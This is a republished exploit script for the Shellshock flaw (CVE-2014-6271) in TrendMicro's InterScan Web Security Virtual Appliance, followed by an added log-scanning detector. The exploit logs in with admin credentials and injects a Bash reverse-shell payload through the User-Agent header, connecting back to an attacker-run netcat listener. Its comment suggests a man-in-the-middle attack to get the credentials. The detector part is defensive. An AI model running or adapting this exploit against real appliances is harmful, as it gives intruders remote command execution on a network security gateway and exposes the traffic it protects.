TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (She
Source: https://www.myhackerhouse.com Author: Fantastic Published: 2016-10-24

#!/usr/bin/env python
# TrendMicro InterScan Web Security Virtual Appliance
# ==================================================
# InterScan Web Security is a software virtual appliance that
# dynamically protects against the ever-growing flood of web
# threats at the Internet gateway exclusively designed to secure
# you against traditional and emerging web threats at the Internet
# gateway. The appliance however is shipped with a vulnerable
# version of Bash susceptible to shellshock (I know right?). An
# attacker can exploit this vulnerability by calling the CGI
# shellscript "/cgi-bin/cgiCmdNotify" which can be exploited
# to perform arbitrary code execution. A limitation of this
# vulnerability is that the attacker must have credentials for
# the admin web interface to exploit this flaw. The panel runs
# over HTTP by default so a man-in-the-middle attack could be
# used to gain credentials and compromise the appliance.
#
# $ python trendmicro_IWSVA_shellshock.py 192.168.56.101 admin password 192.168.56.1
# [+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit
# [-] Authenticating to '192.168.56.101' with 'admin' 'password'
# [-] JSESSIONID = DDE38E62757ADC00A51311F1F953EEBA
# [-] exploiting shellshock CVE-2014-6271...
# bash: no job control in this shell
# bash-4.1$ id
# uid=498(iscan) gid=499(iscan) groups=499(iscan)
#
# -- Hacker Fantastic
#
# (https://www.myhackerhouse.com)
import SimpleHTTPServer
import subprocess
import requests
import sys
import os

def spawn_listener():
 os.system("nc -l 8080")

def shellshock(ip,session,cbip):
 user_agent = {'User-agent': '() { :; }; /bin/bash -i >& /dev/tcp/'+cbip+'/8080 0>&1'}
 cookies = {'JSESSIONID': session}
 print "[-] exploiting shellshock CVE-2014-6271..."
 myreq = requests.get("http://"+ip+":1812/cgi-bin/cgiCmdNotify", headers = user_agent, cookies = cookies)

def login_http(ip,user,password):
 mydata = {'wherefrom':'','wronglogon':'no','uid':user, 'passwd':password,'pwd':'Log+On'}
 print "[-] Authenticating to '%s' with '%s' '%s'" % (ip,user,password)
 myreq = requests.post("http://"+ip+":1812/uilogonsubmit.jsp", data=mydata) 
 session_cookie = myreq.history[0].cookies.get('JSESSIONID')
 print "[-] JSESSIONID = %s" % session_cookie
 return session_cookie

if __name__ == "__main__":
 print "[+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit"
 if len(sys.argv) < 5:
  print "[-] use with <ip> <user> <pass> <connectback_ip>"
  sys.exit()
 newRef=os.fork()
 if newRef==0:
  spawn_listener()
 else:
  session = login_http(sys.argv[1],sys.argv[2],sys.argv[3])
  shellshock(sys.argv[1],session,sys.argv[4])
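
For detection, the request above is recognisable by the Bash function-definition marker "() {" in a header value sent to a CGI path. The following is an added example, not part of the original script or of any vendor tooling: it scans access-log lines for that marker. It assumes the admin interface (or a proxy in front of it) writes Apache combined-format logs; the regexes, function name and sample log lines are constructed for illustration.

```python
import re

# CVE-2014-6271 trigger: a header value carrying a Bash function
# definition "() {" (whitespace between the tokens can vary).
FUNC_DEF = re.compile(r"\(\s*\)\s*\{")

# Apache combined log format (assumed; adjust to the log source in use).
CLF = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>(?:[^"\\]|\\.)*)" '
    r'"(?P<agent>(?:[^"\\]|\\.)*)"'
)

# Constructed sample lines, not taken from a real appliance.
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Oct/2016:10:00:01 +0000] "GET /index.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.66 - - [24/Oct/2016:10:00:07 +0000] "GET /cgi-bin/cgiCmdNotify HTTP/1.1" 200 0 "-" "() { :; }; echo constructed-probe"',
    '192.0.2.67 - - [24/Oct/2016:10:00:09 +0000] "GET /help.html HTTP/1.1" 404 0 "() {  :;}; echo constructed-probe" "curl/7.50"',
]

def scan(lines):
    """Return one finding per log line whose header fields carry '() {'."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = CLF.match(line)
        if m is None:
            continue  # unparsable line: skip rather than guess
        fields = [f for f in ("referer", "agent") if FUNC_DEF.search(m.group(f))]
        if fields:
            findings.append({
                "line": lineno,
                "src": m.group("ip"),
                "path": m.group("path"),
                "fields": fields,
                # CGI passes request headers to the script as environment
                # variables, which is how they reach Bash; a hit on a
                # /cgi-bin/ path answered with 2xx is the priority case.
                "cgi_2xx": m.group("path").startswith("/cgi-bin/")
                           and m.group("status").startswith("2"),
            })
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with cgi_2xx set means the request reached a CGI handler and was served, so the host's Bash version should be checked and patched first.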
